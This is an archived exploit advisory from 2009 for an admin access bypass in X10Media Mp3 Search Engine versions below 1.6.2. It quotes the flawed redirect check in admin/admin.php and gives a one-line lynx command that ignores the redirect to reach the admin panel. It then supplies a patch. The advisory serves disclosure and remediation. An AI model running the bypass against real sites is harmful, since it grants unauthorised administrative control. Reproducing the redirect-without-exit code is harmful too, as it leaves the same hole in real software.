X10Media Mp3 - Search Engine < 1.6.2 Admin Access Vulnerability

2009-04-13T00:00:00
ID EDB-ID:8408
Type exploitdb
Reporter THUNDER
Modified 2009-04-13T00:00:00

Description

X10Media Mp3 Search Engine < 1.6.2 Admin Access Vulnerability. Webapps exploit for php platform

                                        
                                            ################# ~THUNDER ################################################################


    ~Product: X10media Mp3 Search Engine v1.x Admin Access Vulnerability
    ~Author : THUNDER &lt;t4h[at]hotmail.fr&gt;
    ~File : admin/admin.php

##### ~Vulnerable Code ############################################################################


/**

 * User not an administrator, redirect to main page

 * automatically.

 */

if(!$session-&gt;isAdmin()){

   header("Location: ../main.php");

}

else{

/**

 * Administrator is viewing page, so display all

 * forms.

 */

}
----------------------------------------

if the user is not admin redirect it to main.php, so we can exploit it using lynx by disabling redirection.
 
##### ~Exploit ############################################################################

lynx -noredir http://www.vulnerable.com/admin/admin.php

allow the cookies, and you're in admin panel.


##### ~Solution ############################################################################

Open admin/admin.php
1- find:

/**

 * User not an administrator, redirect to main page

 * automatically.

 */

if(!$session-&gt;isAdmin()){

   header("Location: ../main.php");

}

else{

/**

 * Administrator is viewing page, so display all

 * forms.

 */

}



2- Replace it with:

/**

 * User not an administrator, show error 404

 */

if(!$session-&gt;isAdmin()){

   die(header("HTTP/1.1 404 Not Found"));

}

###########################################################################################

# milw0rm.com [2009-04-13]